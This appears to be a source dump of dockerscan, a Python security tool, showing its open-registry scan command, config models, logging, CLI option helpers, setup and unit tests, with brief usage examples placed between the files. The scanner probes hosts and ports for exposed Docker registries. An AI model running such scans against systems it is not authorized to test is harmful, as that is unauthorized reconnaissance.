13 | help="ports to test. i.e: 80,443,8000-8080")
14 | @click.option("-c", "concurrency", help="Maximum concurrency scans")
15 | def scan(ctx, **kwargs):
16 | config = DockerScanModel(**ctx.obj, **kwargs)
17 |
18 | # Check if valid
19 | if check_console_input_config(config):
20 | launch_dockerscan_scan_in_console(config)
21 |
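Following the pattern of the CLI unit tests further down, the command can be smoke-tested with click's CliRunner; --help is used here so no real scan is launched.

    from click.testing import CliRunner

    from dockerscan.actions.scan.cli import scan

    runner = CliRunner()
    result = runner.invoke(scan, ["--help"])

    assert result.exit_code == 0
    assert "Search for Open Docker Registries" in result.output
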
--------------------------------------------------------------------------------
/dockerscan/actions/scan/console.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from dockerscan import get_log_level, run_in_console
4 |
5 | from .api import *
6 | from .model import *
7 |
8 | log = logging.getLogger('dockerscan')
9 |
10 |
11 | def launch_dockerscan_scan_in_console(config: DockerScanModel):
12 | """Launch in console mode"""
13 |
14 | log.setLevel(get_log_level(config.verbosity))
15 |
16 | with run_in_console(config.debug):
17 |
18 |         log.console("Starting the scan")
19 |
20 | results = run_scan_dockerscan(config)
21 |
22 | log.console("Scanning results:")
23 | if results:
24 | for result in results:
25 | for host, open_ports in result.items():
26 | log.console(" > Registry: {}".format(host))
27 |
28 | for port, status, is_ssl in open_ports:
29 | log.console(" - {}/TCP - [SSL: {}] - [{}]".format(
30 | port,
31 | "Enabled" if is_ssl else "Disabled",
32 | status.upper()))
33 |
34 | else:
35 | log.console("No registries found")
36 |
37 |
38 | __all__ = ("launch_dockerscan_scan_in_console",)
39 |
--------------------------------------------------------------------------------
/dockerscan/actions/scan/model.py:
--------------------------------------------------------------------------------
1 |
2 | from dockerscan import SharedConfig, String, Integer
3 |
4 |
5 | class DockerScanModel(SharedConfig):
6 | ports = String(default="443,80,8080,8000,5000")
7 | target = String()
8 | concurrency = String(default="4")
9 | timeout = String(default="2")
10 |
11 | __all__ = ("DockerScanModel",)
12 |
--------------------------------------------------------------------------------
/dockerscan/core/__init__.py:
--------------------------------------------------------------------------------
1 | from .model import *
2 | from .logger import *
3 | from .helpers import *
4 | from .exceptions import *
5 | from .shared_cmd_options import *
6 |
7 | setup_logging("dockerscan")
8 |
--------------------------------------------------------------------------------
/dockerscan/core/exceptions.py:
--------------------------------------------------------------------------------
1 | class DockerscanError(Exception):
2 | pass
3 |
4 |
5 | class DockerscanValueError(ValueError):
6 | pass
7 |
8 |
9 | class DockerscanTypeError(TypeError):
10 | pass
11 |
12 |
13 | class DockerscanTimeoutError(TypeError):
14 | pass
15 |
16 |
17 | class DockerscanNotExitsError(TypeError):
18 | pass
19 |
20 |
21 | class DockerscanReturnContextManager(Exception):
22 | pass
23 |
24 | __all__ = ("DockerscanError", "DockerscanValueError", "DockerscanTypeError",
25 | "DockerscanTimeoutError", "DockerscanNotExitsError",
26 | "DockerscanReturnContextManager")
27 |
--------------------------------------------------------------------------------
/dockerscan/core/helpers.py:
--------------------------------------------------------------------------------
1 | """
2 | This file contains utils and reusable functions
3 | """
4 | import logging
5 |
6 | from collections import namedtuple
7 | from contextlib import contextmanager
8 |
9 | log = logging.getLogger("dockerscan")
10 |
11 |
12 | def dict_to_obj(data):
13 | """
14 |     Transform an input dict into an object.
15 |
16 | >>> data = dict(hello="world", bye="see you")
17 | >>> obj = dict_to_obj(data)
18 | >>> obj.hello
19 | 'world'
20 |
21 | :param data: input dictionary data
22 | :type data: dict
23 | """
24 | assert isinstance(data, dict)
25 |
26 | if not data:
27 | return namedtuple("OBJ", [])
28 |
29 | obj = namedtuple("OBJ", list(data.keys()))
30 |
31 | return obj(**data)
32 |
33 |
34 | def get_log_level(verbosity: int) -> int:
35 | verbosity *= 10
36 |
37 | if verbosity > logging.CRITICAL:
38 | verbosity = logging.CRITICAL
39 |
40 | if verbosity < logging.DEBUG:
41 | verbosity = logging.DEBUG
42 |
43 | return (logging.CRITICAL - verbosity) + 10
44 |
45 |
46 | @contextmanager
47 | def run_in_console(debug=False):
48 | try:
49 | yield
50 | except Exception as e:
51 | log.critical(" !! {}".format(e))
52 |
53 | if debug:
54 | log.exception(" !! Unhandled exception: %s" % e, stack_info=True)
55 | finally:
56 | log.debug("Shutdown...")
57 |
58 |
59 | __all__ = ("dict_to_obj", "get_log_level", "run_in_console")
60 |
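A short worked example of the helpers above; the level values follow directly from the arithmetic in get_log_level (the verbosity count is scaled by 10, clamped to the DEBUG..CRITICAL range, and then inverted).

    import logging

    from dockerscan.core.helpers import dict_to_obj, get_log_level

    assert get_log_level(0) == logging.CRITICAL   # quiet: almost nothing
    assert get_log_level(2) == logging.ERROR
    assert get_log_level(3) == logging.WARNING
    assert get_log_level(5) == logging.DEBUG      # -vvvvv: everything

    obj = dict_to_obj({"hello": "world"})
    assert obj.hello == "world"
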
--------------------------------------------------------------------------------
/dockerscan/core/logger.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import os
4 | import logging
5 | import logging.handlers
6 |
7 | from colorlog import ColoredFormatter
8 |
9 | CONSOLE_LEVEL = 1000
10 |
11 |
12 | def setup_logging(name):
13 | """
14 | Setup initial logging configuration
15 | """
16 |
17 | assert isinstance(name, str)
18 |
19 | # Add console level
20 | logging.addLevelName(CONSOLE_LEVEL, "CONSOLE_LEVEL")
21 |
22 | def console(self, message, *args, **kws): # pragma no cover
23 | # Yes, logger takes its '*args' as 'args'.
24 | if self.isEnabledFor(CONSOLE_LEVEL):
25 | self._log(CONSOLE_LEVEL, message, args, **kws)
26 |
27 | logging.Logger.console = console
28 | logging.Logger.raw_console = console
29 |
30 | # Init logger
31 | logger = logging.getLogger(name)
32 |
33 | # Handler: console
34 | formatter = ColoredFormatter(
35 | "[ %(log_color)s*%(reset)s ] %(blue)s%(message)s",
36 | datefmt=None,
37 | reset=True,
38 | log_colors={
39 | 'DEBUG': 'cyan',
40 | 'INFO': 'white',
41 | 'WARNING': 'yellow',
42 | 'ERROR': 'red',
43 | 'CRITICAL': 'red,bg_white',
44 | 'CONSOLE_LEVEL': 'green'
45 | },
46 | secondary_log_colors={},
47 | style='%'
48 | )
49 |
50 | log_console = logging.StreamHandler()
51 | log_console.setFormatter(formatter)
52 |
53 | # -------------------------------------------------------------------------
54 | # Add all of handlers to logger config
55 | # -------------------------------------------------------------------------
56 | logger.addHandler(log_console)
57 |
58 |
59 | def setup_file_logger(location_file_name: str):
60 | logger = logging.getLogger(location_file_name)
61 |
62 | # Set file log format
63 | file_format = logging.Formatter(
64 | '[%(levelname)s] %(asctime)s - %(message)s', "%Y-%m-%d %H:%M:%S")
65 | log_file = logging.FileHandler(
66 |         filename=os.path.join(os.getcwd(), "dockerscan.log"))
67 |
68 | log_file.setFormatter(file_format)
69 | logger.addHandler(log_file)
70 |
71 | __all__ = ("setup_logging", "setup_file_logger", "CONSOLE_LEVEL")
72 |
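A sketch of the custom console level in use. The logger name "demo" is a placeholder; for the "dockerscan" logger, setup_logging() is already invoked from dockerscan/core/__init__.py.

    import logging

    from dockerscan.core.logger import setup_logging, CONSOLE_LEVEL

    setup_logging("demo")           # attaches the colored console handler

    log = logging.getLogger("demo")
    log.setLevel(CONSOLE_LEVEL)     # only console() messages get through

    log.console("always-visible banner")   # method injected by setup_logging()
    log.debug("suppressed at this level")
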
--------------------------------------------------------------------------------
/dockerscan/core/model.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from booby import *
4 |
5 |
6 | class SharedConfig(Model):
7 | verbosity = Integer(default=0)
8 | debug = Boolean(default=False)
9 | timeout = Integer(default=10)
10 |
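A sketch of how the action models extend this shared base (mirroring scan/model.py and registry/model.py); the "target" field is just an example name.

    from dockerscan import SharedConfig, String


    class ExampleModel(SharedConfig):
        target = String(default="")


    model = ExampleModel(target="127.0.0.1", verbosity=2)
    print(model.target, model.verbosity, model.debug, model.timeout)
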
--------------------------------------------------------------------------------
/dockerscan/core/shared_cmd_options.py:
--------------------------------------------------------------------------------
1 | import re
2 | import os
3 | import click
4 | import codecs
5 |
6 | #
7 | # Get software version
8 | #
9 | version_file = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), "..")), '__init__.py')
10 | with codecs.open(version_file, 'r', 'latin1') as fp: # pragma no cover
11 | try:
12 | version = re.findall(r"^__version__ = ['\"]([^']+)['\"]\r?$",
13 | fp.read(), re.M)[0]
14 | except IndexError:
15 | raise RuntimeError('Unable to determine version.')
16 |
17 | # --------------------------------------------------------------------------
18 | # Common options for command line interface
19 | # --------------------------------------------------------------------------
20 | global_options_list = (
21 | # General
22 | click.option('-v', 'verbosity', count=True, type=int, default=1,
23 | help='Verbose output'),
24 | click.option('-d', 'debug', is_flag=True, default=False,
25 | help='enable debug'),
26 | click.option('--quiet', '-q', 'verbosity', flag_value=0,
27 | help='Minimal output'),
28 | click.version_option(version=version)
29 | )
30 |
31 |
32 | class global_options(object):
33 | def __init__(self, invoke_without_command=False):
34 | assert isinstance(invoke_without_command, bool)
35 |
36 | self.invoke_without_command = invoke_without_command
37 |
38 | def __call__(self, f):
39 | def wrapped_f(*args):
40 | fn = f
41 | for option in reversed(global_options_list):
42 |                 fn = option(fn)
43 |
44 | fn = click.group(context_settings={'help_option_names': ['-h', '--help']},
45 | invoke_without_command=self.invoke_without_command)(fn)
46 |
47 | return fn
48 |
49 | return wrapped_f()
50 |
51 |
52 | #
53 | # HERE MORE EXAMPLES OF CMD OPTIONS
54 | #
55 | # --------------------------------------------------------------------------
56 | # Options for "auto" command
57 | # --------------------------------------------------------------------------
58 | #
59 | # auto_options_list = (
60 | # click.option('-T', '--timeout', 'timeout', type=int, default=60,
61 | # help="max time to wait until actions are available"),
62 | # )
63 | #
64 | #
65 | # class auto_options(object):
66 | # def __call__(self, f):
67 | # def wrapped_f(*args):
68 | # fn = f
69 | # for option in reversed(auto_options_list):
70 | # fn = option(f)
71 | #
72 | # return fn
73 | #
74 | # return wrapped_f()
75 |
76 |
77 | __all__ = ("global_options",) # "auto_options")
78 |
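A sketch of how the global_options decorator might be applied to build a command group; the group and sub-command names are placeholders, not the real dockerscan CLI wiring.

    import click

    from dockerscan.core.shared_cmd_options import global_options


    @global_options()
    @click.pass_context
    def cli(ctx, **kwargs):
        # Keep the parsed global options (verbosity, debug, ...) so the
        # sub-commands can read them later
        ctx.obj = kwargs


    @cli.command(help="Example sub-command")
    @click.pass_context
    def info(ctx, **kwargs):
        click.echo("verbosity = {}".format(ctx.obj["verbosity"]))

Storing the options in ctx.obj is what lets sub-commands such as scan rebuild their configuration with DockerScanModel(**ctx.obj, **kwargs), as seen in dockerscan/actions/scan/cli.py above.
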
--------------------------------------------------------------------------------
/pytest.ini:
--------------------------------------------------------------------------------
1 | [pytest]
2 | norecursedirs = docs *.egg-info .git apitest .tox examples thirdparty
3 |
4 | [run]
5 | omit = tests/*
--------------------------------------------------------------------------------
/requirements-dev.txt:
--------------------------------------------------------------------------------
1 | sphinx
2 | alabaster
3 |
--------------------------------------------------------------------------------
/requirements-performance.txt:
--------------------------------------------------------------------------------
1 | ujson
--------------------------------------------------------------------------------
/requirements-runtest.txt:
--------------------------------------------------------------------------------
1 | pytest
2 | pytest-xdist
3 | pytest-asyncio
4 | pytest-coverage
5 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | click==6.7
2 | booby-ng==0.8.4
3 | requests
4 | colorlog==3.1.2
5 | python-dxf==5.1.1
6 |
7 | # If SSL connections fail, install these dependencies
8 | # pyOpenSSL ndg-httpsclient pyasn1
9 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | #
3 | # dockerscan
4 | #
5 | # Redistribution and use in source and binary forms, with or without
6 | # modification, are permitted provided that the
7 | # following conditions are met:
8 | #
9 | # 1. Redistributions of source code must retain the above copyright notice,
10 | # this list of conditions and the
11 | # following disclaimer.
12 | #
13 | # 2. Redistributions in binary form must reproduce the above copyright notice,
14 | # this list of conditions and the
15 | # following disclaimer in the documentation and/or other materials provided
16 | # with the distribution.
17 | #
18 | # 3. Neither the name of the copyright holder nor the names of its contributors
19 | # may be used to endorse or promote
20 | # products derived from this software without specific prior written
21 | # permission.
22 | #
23 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
24 | # AND ANY EXPRESS OR IMPLIED WARRANTIES,
25 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
26 | # FITNESS FOR A PARTICULAR PURPOSE ARE
27 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
28 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL,
29 | # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
30 | # PROCUREMENT OF SUBSTITUTE GOODS OR
31 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
32 | # CAUSED AND ON ANY THEORY OF LIABILITY,
33 | # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
34 | # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
35 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
36 | #
37 |
38 | import re
39 | import os
40 | import sys
41 | import codecs
42 |
43 | from os.path import dirname, join
44 | from setuptools import setup, find_packages
45 | from setuptools.command.test import test as TestCommand
46 |
47 |
48 | if sys.version_info < (3, 5,):
49 | raise RuntimeError("dockerscan requires Python 3.5.0+")
50 |
51 |
52 | #
53 | # Get software version
54 | #
55 | version_file = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), "dockerscan")), '__init__.py')
56 | with codecs.open(version_file, 'r', 'latin1') as fp:
57 | try:
58 | version = re.findall(r"^__version__ = ['\"]([^']+)['\"]\r?$",
59 | fp.read(), re.M)[0]
60 | except IndexError:
61 | raise RuntimeError('Unable to determine version.')
62 |
63 |
64 | with open(join(dirname(__file__), 'requirements.txt')) as f:
65 | required = f.read().splitlines()
66 |
67 | with open(join(dirname(__file__), 'requirements-performance.txt')) as f:
68 | required_performance = f.read().splitlines()
69 |
70 | with open(join(dirname(__file__), 'README.rst')) as f:
71 | long_description = f.read()
72 |
73 |
74 | class PyTest(TestCommand):
75 | user_options = []
76 |
77 | def run(self):
78 | import subprocess
79 | import sys
80 | errno = subprocess.call([sys.executable, '-m', 'pytest', '--cov-report', 'html', '--cov-report', 'term', '--cov', 'dockerscan/'])
81 | raise SystemExit(errno)
82 |
83 |
84 | setup(
85 | name='dockerscan',
86 | version=version,
87 | install_requires=required,
88 | url='https://github.com/cr0hn/dockerscan',
89 | license='BSD',
90 | author='Daniel Garcia (cr0hn) / Roberto Munoz (robskye)',
91 | author_email='cr0hn@cr0hn.com',
92 | packages=find_packages(),
93 | include_package_data=True,
94 | extras_require={
95 | 'performance': required_performance
96 | },
97 | entry_points={'console_scripts': [
98 | 'dockerscan = dockerscan.actions.cli:cli',
99 | ]},
100 |     description='Docker analysis tools',
101 | long_description=long_description,
102 | classifiers=[
103 | 'Environment :: Console',
104 | 'Intended Audience :: System Administrators',
105 | 'Intended Audience :: Other Audience',
106 | 'License :: OSI Approved :: BSD License',
107 | 'Operating System :: MacOS',
108 | 'Operating System :: Microsoft :: Windows',
109 | 'Operating System :: POSIX',
110 | 'Programming Language :: Python :: 3.5',
111 | 'Topic :: Security',
112 | ],
113 | cmdclass=dict(test=PyTest)
114 | )
--------------------------------------------------------------------------------
/test/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/api/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/api/test_run_dockerscan.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from dockerscan.actions.default.api import run_default_dockerscan
4 |
5 |
6 | def test_run_default_dockerscan_runs_ok():
7 |
8 | #
9 | # FILL THIS WITH A TEST
10 | #
11 | # assert run_default_dockerscan() is None
12 | pass
13 |
14 |
15 | def test_run_default_dockerscan_empty_input():
16 |
17 | with pytest.raises(AssertionError):
18 | run_default_dockerscan(None)
19 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/cli/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/cli/test_cli.py:
--------------------------------------------------------------------------------
1 | from click.testing import CliRunner
2 | from dockerscan.actions.default.cli import cli
3 |
4 |
5 | def test_parser_cli_runs_ok():
6 | runner = CliRunner()
7 | result = runner.invoke(cli, ["-h"])
8 |
9 | assert result.exit_code == 0
10 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/cli/test_cli_info.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 | from click.testing import CliRunner
4 |
5 | from dockerscan.actions.default.cli import info
6 |
7 | import dockerscan.actions.default.console
8 |
9 |
10 | def _launch_dockerscan_in_console(blah, **kwargs):
11 | click.echo("ok")
12 |
13 |
14 | def test_cli_info_runs_show_help():
15 | runner = CliRunner()
16 | result = runner.invoke(info)
17 |
18 | assert 'Usage: info [OPTIONS] ' in result.output
19 |
20 |
21 | def test_cli_info_runs_ok():
22 |     # Patch the launch of: launch_dockerscan_in_console
23 | dockerscan.actions.default.cli.launch_dockerscan_in_console = _launch_dockerscan_in_console
24 |
25 | runner = CliRunner()
26 | result = runner.invoke(info, ["aaaa"])
27 |
28 | assert 'ok' in result.output
29 |
--------------------------------------------------------------------------------
/test/unittesting/core/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/core/helpers/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/core/helpers/test_dict_to_obj.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from dockerscan.core.helpers import dict_to_obj
4 |
5 |
6 | def test_dict_to_obj_response_ok():
7 |
8 | ret = dict_to_obj(dict(hello="world", bye="see you"))
9 |
10 | assert hasattr(ret, "hello")
11 | assert hasattr(ret, "bye")
12 |
13 |
14 | def test_dict_to_obj_response_invalid_input():
15 |
16 | with pytest.raises(AssertionError):
17 | dict_to_obj(None)
18 |
19 |
20 | def test_dict_to_obj_response_empty():
21 |
22 | assert issubclass(dict_to_obj({}), object)
23 |
--------------------------------------------------------------------------------
/test/unittesting/core/logger/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/core/logger/test_setup_logging.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from dockerscan.core.logger import setup_logging
4 |
5 |
6 | def test_setup_logging_runs_ok():
7 | assert setup_logging("blah") is None
8 |
9 |
10 | def test_setup_logging_runs_null_as_name():
11 |
12 | with pytest.raises(AssertionError):
13 | setup_logging(None)
14 |
15 |
16 | def test_setup_logging_runs_invalid_as_name():
17 | with pytest.raises(AssertionError):
18 | setup_logging(dict())
19 |
--------------------------------------------------------------------------------
/test/unittesting/core/shared_cmd_options/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/core/shared_cmd_options/test_global_options.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from dockerscan.core.shared_cmd_options import global_options
4 |
5 |
6 | def test_global_options_runs_ok():
7 |
8 | c = global_options()
9 |
10 | assert callable(c.__call__(lambda x: x)) is True
11 |
12 |
13 | def test_global_options_check_input_params():
14 |
15 | with pytest.raises(AssertionError):
16 | global_options(None)
17 |
--------------------------------------------------------------------------------
/test/unittesting/mains/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/mains/test_apitest_comparer_main.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import pytest
3 |
4 | from dockerscan.__main__ import main
5 |
6 |
7 | def test_dockerscan___main__runs_ok():
8 | # This test checks that the main command line run well
9 |
10 | sys.argv = [sys.argv[0], "-h"]
11 |
12 | with pytest.raises(SystemExit) as e:
13 | main()
14 |
15 | assert str(e.value) == '0'
16 |
--------------------------------------------------------------------------------
/tox.ini:
--------------------------------------------------------------------------------
1 | [tox]
2 | envlist = py35,py36,flake8
3 |
4 | [testenv]
5 | deps =
6 | -rrequirements.txt
7 | -rrequirements-dev.txt
8 | commands = py.test
9 |
10 | [flake8]
11 | select=E501,E306,W,E
12 | exclude=.*,doc/,examples/,tests/,dist/,*egg*
--------------------------------------------------------------------------------